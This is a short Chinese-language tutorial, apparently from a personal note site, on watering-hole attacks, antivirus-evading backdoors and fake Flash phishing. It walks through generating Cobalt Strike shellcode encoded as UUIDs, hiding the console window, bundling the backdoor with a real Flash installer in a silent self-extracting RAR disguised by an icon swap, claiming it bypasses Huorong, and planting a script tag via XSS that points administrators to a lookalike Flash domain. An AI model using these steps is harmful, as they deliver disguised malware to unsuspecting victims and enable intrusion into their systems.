水抗攻击 免杀后门 加flash钓鱼制作

1.水抗攻击

“水坑攻击”，黑客攻击方式之一，顾名思义，是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做 法是，黑客分析攻击目标的上网活动规律，寻找攻击目标经常访问的网站的弱点，先将此网站“攻破”并 植入攻击代码，一旦攻击目标访问该网站就会“中招

在渗透测试中，通常用于后台没法拿webshell，在网站找xss漏洞植入后门，当管理员访问时，弹出框 诱导管理员下载后门文件

2.制作免杀后门

使用cobalt strike 生成shellcode 再转成uuid

关注 uuid shellcode 可以查看学习原理 nim-lang callback uuid shellcode

https://www.jianshu.com/p/f61bbb7d6c70

打开项目在payload.h填写 在load.cpp 加入 隐藏终端框

#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"" )

生成的uuid字符串 设置 release x64 生成即可

生成即可 免杀的方法有很多，大家自己去找

3.创建rar自解压

首先下载登录flash下载exe文件 flashcenter_install_cn.exe

1.设置好压缩名 选择创建自解压

2.选择高级 设置路径 C:windowstemp

3.设置程序

C:windowstempflash.exe
C:windowstempflashcenter_install_cn.exe

4.安静模式 全部隐藏

5.更新方式 解压并更新文件 覆盖方式 覆盖所有文件

6.确定即可

7.修改

设置好的文件 图标还是解压的图标 使用工具替换图标

设置好后

当模板执行后自动允许后门和安装程序 后门也会上线

这个方式目前可以过火绒 360另外找方法了

4.搭建FLASH钓鱼

注册一个类似flash官网的域名，把源码和后门上传到网站上

修改源码 跳转改成后门的地址 在后台找xss 填写

<script src="域名/flash.js"></script>

5.测试

当目标访问 访问网址 或者登录后台的时候

更新: 2025-05-09 10:25:39
原文: https://www.yuque.com/yuhui.net/network/erkgmhupc65bmih5